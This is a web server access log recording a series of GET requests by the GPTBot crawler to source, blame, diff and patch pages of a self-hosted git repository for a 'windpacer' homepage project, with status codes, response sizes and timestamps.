"/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json" -[17/Feb/2026:13:08:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" -[17/Feb/2026:13:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/vite.config.ts" -[17/Feb/2026:13:08:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" -[17/Feb/2026:13:08:30 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 74.7.227.38] [Length 10954] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" -[17/Feb/2026:13:08:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" [Client 74.7.227.38] [Length 10808] [Gzip 4.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" -[17/Feb/2026:13:08:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 74.7.227.38] [Length 12447] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" -[17/Feb/2026:13:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" -[17/Feb/2026:13:08:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 74.7.227.38] [Length 12745] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/README.md" -[17/Feb/2026:13:08:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 74.7.227.38] [Length 11667] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 74.7.227.38] [Length 10939] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" -[17/Feb/2026:13:08:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 74.7.227.38] [Length 11932] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" -[17/Feb/2026:13:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" [Client 74.7.227.38] [Length 35536] [Gzip 11.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/js/i18n.js" -[17/Feb/2026:13:08:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 10867] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images" -[17/Feb/2026:13:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" [Client 74.7.227.38] [Length 12446] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/App.tsx" -[17/Feb/2026:13:08:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" [Client 74.7.227.38] [Length 12444] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/App.tsx" -[17/Feb/2026:13:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" [Client 74.7.227.38] [Length 12444] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/App.tsx" -[17/Feb/2026:13:08:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" [Client 74.7.227.38] [Length 14237] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:13:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 74.7.227.38] [Length 12448] [Gzip 5.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" -[17/Feb/2026:13:08:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/App.tsx" -[17/Feb/2026:13:08:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 74.7.227.38] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" -[17/Feb/2026:13:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 74.7.227.38] [Length 10952] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" -[17/Feb/2026:13:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 74.7.227.38] [Length 10120] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" -[17/Feb/2026:13:08:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" -[17/Feb/2026:13:08:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 74.7.227.38] [Length 9956] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" -[17/Feb/2026:13:08:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore" -[17/Feb/2026:13:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 74.7.227.38] [Length 11820] [Gzip 4.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" -[17/Feb/2026:13:08:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" -[17/Feb/2026:13:08:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx.conf" -[17/Feb/2026:13:08:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png" -[17/Feb/2026:13:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/components/ChatBot.tsx" -[17/Feb/2026:13:08:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" [Client 74.7.227.38] [Length 12740] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" [Client 74.7.227.38] [Length 11307] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html" -[17/Feb/2026:13:08:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" [Client 74.7.227.38] [Length 10087] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e" -[17/Feb/2026:13:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 146723] [Gzip 20.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/favicon.ico" -[17/Feb/2026:13:08:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" [Client 74.7.227.38] [Length 10435] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a.diff" [Client 74.7.227.38] [Length 63098] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:13:08:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a.patch" [Client 74.7.227.38] [Length 63577] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:13:08:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.diff" [Client 74.7.227.38] [Length 1320643] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:08:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec.patch" [Client 74.7.227.38] [Length 818493] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch" [Client 74.7.227.38] [Length 4652900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:08:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f.patch" [Client 74.7.227.38] [Length 12243] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:08:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" [Client 74.7.227.38] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" -[17/Feb/2026:13:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" [Client 74.7.227.38] [Length 10955] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" -[17/Feb/2026:13:08:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" [Client 74.7.227.38] [Length 9857] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.vscode" -[17/Feb/2026:13:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/App.tsx" -[17/Feb/2026:13:08:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" [Client 74.7.227.38] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/README.md" -[17/Feb/2026:13:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 74.7.227.38] [Length 11306] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html" -[17/Feb/2026:13:08:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" [Client 74.7.227.38] [Length 11307] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:13:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" [Client 74.7.227.38] [Length 14935] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:08:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f.diff" [Client 74.7.227.38] [Length 11600] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f" -[17/Feb/2026:13:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8" [Client 74.7.227.38] [Length 14825] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8" -[17/Feb/2026:13:08:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" [Client 74.7.227.38] [Length 9865] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/App.tsx" -[17/Feb/2026:13:09:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr 